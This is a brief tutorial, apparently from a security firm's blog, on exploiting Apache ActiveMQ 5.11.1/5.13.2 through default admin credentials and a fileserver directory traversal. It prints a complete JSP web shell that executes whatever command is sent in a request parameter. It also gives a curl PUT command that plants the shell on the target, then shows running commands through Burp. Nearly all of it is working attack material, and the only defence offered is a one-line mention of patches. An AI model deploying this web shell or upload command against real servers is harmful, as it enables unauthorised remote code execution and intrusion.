Exploiting ActiveMQ 5.11.1/5.13.2 under 5 minutes with 5 steps (Directory Traversal / RCE)
Today we are going to exploit an activeMQ running on port 8161 without Metasploit.
Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides “Enterprise Features” which in this case means fostering the communication from more than one client or server.
Time to exploit:
We first of all visit the target domain on the specific port (8161)
Navigate to the /admin path
By entering default credential, we are able to login to the portal. We create a file on our attacker machine as inveteck.jsp
$ cat inveteck.jsp<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="attack">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("attack") != null) {
out.println("Command: " + request.getParameter("attack") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("attack"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
run a curl command to put(upload) the created inveteck.jsp to the server:
curl -u ‘username:password’ -v -X PUT -data “@inveteck.jsp” http://TARGET:8161/fileserver/..\\admin\\inveteck.jsp
Capture request in burp suite, send it over to repeater and try to run ipconfig to check the ip address of our target
Recommendation: The ActiveMQ project has released an advisory and patches.
www.inveteckglobal.com
credit: DAVID JORM